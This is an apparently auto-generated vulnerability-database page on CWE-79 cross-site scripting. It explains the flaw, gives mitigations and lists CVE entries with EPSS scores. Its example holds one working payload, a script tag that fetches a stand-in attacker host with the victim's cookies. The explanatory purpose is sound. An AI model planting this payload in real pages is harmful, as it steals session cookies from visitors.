Fallos del tipo CWE-79

28.677 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-2865HIGHA cross-site scripting issue has been discovered in GitLab CE/EE affecting all versions before 15.1.6, 15.2 to 15.2.4 and 15.3 prior to 15.3EPSS 0.8%CVE-2026-0279LOWPAN-OS: Multiple Cross-Site Scripting (XSS) VulnerabilitiesEPSS 0.8%CVE-2026-66882LOWReflected XSS in AshAuthentication confirmation and magic link interaction formsEPSS 0.8%CVE-2021-44163MEDIUMChain Sea Information Integration Co., Ltd ai chatbot system - Reflected XSSEPSS 0.8%CVE-2021-38345HIGHBrizy <= 1.0.125 and 1.0.127 – 2.3.11 Incorrect authorization checks allowing Post modificationEPSS 0.8%CVE-2021-24205—Elementor < 3.1.2 - Authenticated Stored Cross-Site Scripting (XSS) in Icon Box WidgetEPSS 0.8%CVE-2022-24811MEDIUMCross-site Scripting in Combodo iTopEPSS 0.7%CVE-2017-7437MEDIUMCross site scripting attacks against NetIQ Privileged Account ManagerEPSS 0.7%CVE-2024-26089MEDIUMAdobe Experience Manager | Cross-site Scripting (DOM-based XSS) (CWE-79)EPSS 0.7%CVE-2017-7419MEDIUMNetIQ Access Manager OAuth Consent screen XSS attackEPSS 0.7%CVE-2020-6804HIGHXSS in Mozilla WebThings GatewayEPSS 0.7%CVE-2023-6013CRITICALH2O Local File IncludeEPSS 0.7%CVE-2023-0038HIGHSurvey Maker – Best WordPress Survey Plugin <= 3.1.3 - Unauthenticated Stored Cross-Site ScriptingEPSS 0.7%CVE-2024-26090MEDIUMAdobe Experience Manager | Cross-site Scripting (DOM-based XSS) (CWE-79)EPSS 0.7%CVE-2019-25147HIGHPretty Links <= 2.1.9 - Unauthenticated Stored Cross-Site Scripting via track_linkEPSS 0.7%CVE-2024-44081CRITICALIn Jitsi Meet before 2.0.9779, the functionality to share a video file was implemented in an insecure way, resulting in clients loading videEPSS 0.7%CVE-2022-44724HIGHThe Handy Tip macro in Stiltsoft Handy Macros for Confluence Server/Data Center 3.x before 3.5.5 allows remote attackers to inject arbitraryEPSS 0.7%CVE-2021-24147—Modern Events Calendar Lite < 5.16.5 - Authenticated Stored Cross-Site Scripting (XSS)EPSS 0.7%CVE-2026-73417HIGHJupyterLab: Cross-site scripting (XSS) via crafted settings file (`overrides.json`)EPSS 0.7%CVE-2023-28309HIGHMicrosoft Dynamics 365 (on-premises) Cross-site Scripting VulnerabilityEPSS 0.7%